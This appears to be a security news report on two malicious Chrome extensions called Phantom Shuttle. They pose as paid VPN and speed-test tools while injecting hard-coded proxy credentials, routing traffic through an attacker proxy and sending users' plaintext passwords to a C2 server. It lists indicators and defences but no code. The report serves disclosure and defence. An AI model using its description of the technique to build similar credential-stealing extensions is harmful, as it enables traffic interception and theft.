Cybersecurity researchers have discovered two malicious Google Chrome extensions with the same name and published by the same developer that have the ability to intercept traffic and capture user credentials.
The extension is advertised as a “multi-location network speed test plugin” for developers and trade professionals. At the time of writing, both browser add-ons are available for download. Here are the extension details:
- Phantom Shuttle (ID: fbfldogmkadejddihifklefknmikncaj) – 2,000 users (released November 26, 2017)
- Phantom Shuttle (ID: ocpcmfmiidofonkbodpdhgddhlcmcofd) – 180 users (released April 27, 2023)
“Users pay subscriptions ranging from 9.9 to 95.9 CNY ($1.40 to $13.50) believing they are purchasing a legitimate VPN service, but both variants perform the same malicious operations,” said socket security researcher Kush Pandya.
“Behind the subscription facade, the extension performs full traffic interception through authentication credential injection, acts as a man-in-the-middle proxy, and continuously exfiltrate user data to the threat actor’s C2 (command and control) server.”
Once an unsuspecting user makes a payment, they receive VIP status and the extension automatically enables “smart” proxy mode, which routes traffic from over 170 targeted domains through the C2 infrastructure.
The extension works as advertised and reinforces the illusion of a functional product. It performs real latency tests on the proxy server and displays connection status while keeping users in the dark about its main purpose: intercepting network traffic and stealing credentials.
This includes malicious changes added to two JavaScript libraries bundled with the extension: jquery-1.12.2.min.js and scripts.js. This code is designed to automatically inject hard-coded proxy credentials (topfany / 963852wei) into all HTTP authentication challenges for all websites by registering a listener on chrome.webRequest.onAuthRequired.
“When a website or service requests HTTP authentication (basic, digest, or proxy authentication), this listener fires before the browser displays the credentials prompt,” Pandya explained. “It responds instantly with hard-coded proxy credentials, completely transparent to the user. The asyncBlocking mode ensures synchronous credential injection and prevents user interaction.”
Once the user authenticates to the proxy server, the extension uses a proxy autoconfiguration (PAC) script to configure Chrome’s proxy settings and implements three modes:
- close, proxy functionality will be disabled
- Always route all web traffic through the proxy.
- Smarty routes a hard-coded list of over 170 high-value domains through proxies.
The list of domains includes developer platforms (GitHub, Stack Overflow, Docker), cloud services (Amazon Web Services, Digital Ocean, Microsoft Azure), enterprise solutions (Cisco, IBM, VMware), social media (Facebook, Instagram, Twitter), and adult content sites. Socket theorized that the posting of the porn site was likely an attempt to intimidate the victim.
The end result of this behavior is that the user’s web traffic is routed through a proxy controlled by the threat actor, while maintaining a 60 second heartbeat to the C2 server at phantomshuttle(.)space, the domain where the extension continues to operate. It also gives the attacker a “man-in-the-middle” (MitM) position to capture traffic, manipulate responses, and inject arbitrary payloads.
More importantly, the heartbeat message sends the VIP user’s email, plaintext password, and version number via an HTTP GET request to an external server every 5 minutes for continuous credential extraction and session monitoring.
“The combination of heartbeat extraction (credentials and metadata) and proxy MitM (real-time traffic capture) provides comprehensive data theft capabilities that keep the extension active and running continuously,” Socket said.
In other words, the extension captures passwords, credit card numbers, authentication cookies, browsing history, form data, API keys, and access tokens from users who access the target domain when VIP mode is active. Additionally, theft of sensitive developer information can pave the way for supply chain attacks.
It is currently unclear who is behind this eight-year operation, but the use of Chinese in the extension description, the presence of Alipay/WeChat Pay integration for payments, and the use of Alibaba Cloud as a host for the C2 domain indicate a China-based operation.
“Subscription models create victim retention while generating revenue, and professional infrastructure with payment integrations gives the appearance of legitimacy,” Socket said. “We believe that users are unknowingly purchasing VPN services with the ability to completely compromise their traffic.”
This finding highlights how browser-based extensions are becoming an unmanaged layer of risk for businesses. Users who have installed the extension are encouraged to remove it as soon as possible. It is essential for security teams to deploy extension allowlists, monitor extensions through a combination of subscription payment systems and proxy permissions, and implement network monitoring for suspicious proxy authentication attempts.
